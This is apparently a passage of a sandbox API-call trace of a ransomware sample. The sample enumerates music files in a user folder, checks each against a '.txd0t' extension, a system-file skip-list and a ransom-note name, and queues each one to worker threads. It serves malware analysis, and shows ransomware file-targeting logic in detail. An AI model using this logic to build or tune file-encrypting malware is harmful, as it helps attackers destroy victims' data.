[0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="cryptolocker") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="ransomware") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\WINDOWS") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files") returned 0x0 [0075.004] GetProcessHeap () returned 0xe30000 [0075.004] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f0) returned 0xed36d0 [0075.004] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.004] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\*", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*" [0075.004] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0xa85145e0, ftLastAccessTime.dwHighDateTime=0x1d5f031, ftLastWriteTime.dwLowDateTime=0xa85145e0, ftLastWriteTime.dwHighDateTime=0x1d5f031, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec27f0 [0075.004] StrCmpW (psz1=".", psz2=".") returned 0 [0075.005] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0xa85145e0, ftLastAccessTime.dwHighDateTime=0x1d5f031, ftLastWriteTime.dwLowDateTime=0xa85145e0, ftLastWriteTime.dwHighDateTime=0x1d5f031, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.005] StrCmpW (psz1="..", psz2=".") returned 1 [0075.005] StrCmpW (psz1="..", psz2="..") returned 0 [0075.005] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x556ab80, ftCreationTime.dwHighDateTime=0x1d5e971, ftLastAccessTime.dwLowDateTime=0x40fcd280, ftLastAccessTime.dwHighDateTime=0x1d5e413, ftLastWriteTime.dwLowDateTime=0x40fcd280, ftLastWriteTime.dwHighDateTime=0x1d5e413, nFileSizeHigh=0x0, nFileSizeLow=0x4654, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="0JKj5_ifBaM.wav", cAlternateFileName="0JKJ5_~1.WAV")) returned 1 [0075.005] StrCmpW (psz1="0JKj5_ifBaM.wav", psz2=".") returned 1 [0075.005] StrCmpW (psz1="0JKj5_ifBaM.wav", psz2="..") returned 1 [0075.005] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.005] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.005] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="0JKj5_ifBaM.wav", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" [0075.005] PathFindExtensionW (pszPath="0JKj5_ifBaM.wav") returned=".wav" [0075.005] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="bootsect.bak") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="iconcache.db") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="thumbs.db") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2=" ransomware ") returned 1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2=" ransom ") returned 1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="debug.txt") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="boot.ini") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="desktop.ini") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="autorun.inf") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="ntuser.dat") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="ntldr") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="ntdetect.com") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="bootfont.bin") returned -1 [0075.005] StrCmpIW (psz1="0JKj5_ifBaM.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.005] PathFindExtensionW (pszPath="0JKj5_ifBaM.wav") returned=".wav" [0075.005] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.005] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.005] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.005] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.012] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.012] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav" [0075.012] SetEvent (hEvent=0x3fc) returned 1 [0075.012] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d44f7a0, ftCreationTime.dwHighDateTime=0x1d5e4a9, ftLastAccessTime.dwLowDateTime=0x35d78040, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x35d78040, ftLastWriteTime.dwHighDateTime=0x1d5e480, nFileSizeHigh=0x0, nFileSizeLow=0x11f5e, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="3MXWb597R4.mp3", cAlternateFileName="3MXWB5~1.MP3")) returned 1 [0075.012] StrCmpW (psz1="3MXWb597R4.mp3", psz2=".") returned 1 [0075.012] StrCmpW (psz1="3MXWb597R4.mp3", psz2="..") returned 1 [0075.012] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.012] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.012] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="3MXWb597R4.mp3", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" [0075.012] PathFindExtensionW (pszPath="3MXWb597R4.mp3") returned=".mp3" [0075.012] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="bootsect.bak") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="iconcache.db") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="thumbs.db") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2=" ransomware ") returned 1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2=" ransom ") returned 1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="debug.txt") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="boot.ini") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="desktop.ini") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="autorun.inf") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="ntuser.dat") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="ntldr") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="ntdetect.com") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="bootfont.bin") returned -1 [0075.012] StrCmpIW (psz1="3MXWb597R4.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.012] PathFindExtensionW (pszPath="3MXWb597R4.mp3") returned=".mp3" [0075.012] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.013] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.013] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.013] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.027] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.027] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" [0075.027] SetEvent (hEvent=0x3fc) returned 1 [0075.027] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b39650, ftCreationTime.dwHighDateTime=0x1d5ed09, ftLastAccessTime.dwLowDateTime=0x7e8f770, ftLastAccessTime.dwHighDateTime=0x1d5ec98, ftLastWriteTime.dwLowDateTime=0x7e8f770, ftLastWriteTime.dwHighDateTime=0x1d5ec98, nFileSizeHigh=0x0, nFileSizeLow=0x16014, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="BhtHzSyEfD5ggEidkz.wav", cAlternateFileName="BHTHZS~1.WAV")) returned 1 [0075.027] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2=".") returned 1 [0075.027] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="..") returned 1 [0075.027] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="BhtHzSyEfD5ggEidkz.wav", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" [0075.027] PathFindExtensionW (pszPath="BhtHzSyEfD5ggEidkz.wav") returned=".wav" [0075.027] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="bootsect.bak") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="iconcache.db") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="thumbs.db") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2=" ransomware ") returned 1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2=" ransom ") returned 1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="debug.txt") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="boot.ini") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="desktop.ini") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="autorun.inf") returned 1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="ntuser.dat") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="ntldr") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="ntdetect.com") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="bootfont.bin") returned -1 [0075.028] StrCmpIW (psz1="BhtHzSyEfD5ggEidkz.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.028] PathFindExtensionW (pszPath="BhtHzSyEfD5ggEidkz.wav") returned=".wav" [0075.028] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.028] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.028] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.028] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.037] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.037] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" [0075.037] SetEvent (hEvent=0x3fc) returned 1 [0075.037] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f497d20, ftCreationTime.dwHighDateTime=0x1d5e23f, ftLastAccessTime.dwLowDateTime=0xed9388f0, ftLastAccessTime.dwHighDateTime=0x1d5e214, ftLastWriteTime.dwLowDateTime=0xed9388f0, ftLastWriteTime.dwHighDateTime=0x1d5e214, nFileSizeHigh=0x0, nFileSizeLow=0x15975, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="fJIkxuPkzHAaTw7Bvg2.mp3", cAlternateFileName="FJIKXU~1.MP3")) returned 1 [0075.037] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2=".") returned 1 [0075.037] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="..") returned 1 [0075.037] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="fJIkxuPkzHAaTw7Bvg2.mp3", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" [0075.038] PathFindExtensionW (pszPath="fJIkxuPkzHAaTw7Bvg2.mp3") returned=".mp3" [0075.038] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="bootsect.bak") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="iconcache.db") returned -1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="thumbs.db") returned -1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2=" ransomware ") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2=" ransom ") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="debug.txt") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="boot.ini") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="desktop.ini") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="autorun.inf") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="ntuser.dat") returned -1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="ntldr") returned -1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="ntdetect.com") returned -1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="bootfont.bin") returned 1 [0075.038] StrCmpIW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.038] PathFindExtensionW (pszPath="fJIkxuPkzHAaTw7Bvg2.mp3") returned=".mp3" [0075.038] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.038] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.038] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.038] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.047] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.047] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" [0075.048] SetEvent (hEvent=0x3fc) returned 1 [0075.048] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe94b7da0, ftCreationTime.dwHighDateTime=0x1d5e446, ftLastAccessTime.dwLowDateTime=0x1b174e50, ftLastAccessTime.dwHighDateTime=0x1d5e92d, ftLastWriteTime.dwLowDateTime=0x1b174e50, ftLastWriteTime.dwHighDateTime=0x1d5e92d, nFileSizeHigh=0x0, nFileSizeLow=0x605d, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="lwEeZe6NJKctwuGef3c.mp3", cAlternateFileName="LWEEZE~1.MP3")) returned 1 [0075.048] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2=".") returned 1 [0075.048] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="..") returned 1 [0075.048] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="lwEeZe6NJKctwuGef3c.mp3", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" [0075.048] PathFindExtensionW (pszPath="lwEeZe6NJKctwuGef3c.mp3") returned=".mp3" [0075.048] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="bootsect.bak") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="iconcache.db") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="thumbs.db") returned -1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2=" ransomware ") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2=" ransom ") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="debug.txt") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="boot.ini") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="desktop.ini") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="autorun.inf") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="ntuser.dat") returned -1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="ntldr") returned -1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="ntdetect.com") returned -1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="bootfont.bin") returned 1 [0075.048] StrCmpIW (psz1="lwEeZe6NJKctwuGef3c.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.048] PathFindExtensionW (pszPath="lwEeZe6NJKctwuGef3c.mp3") 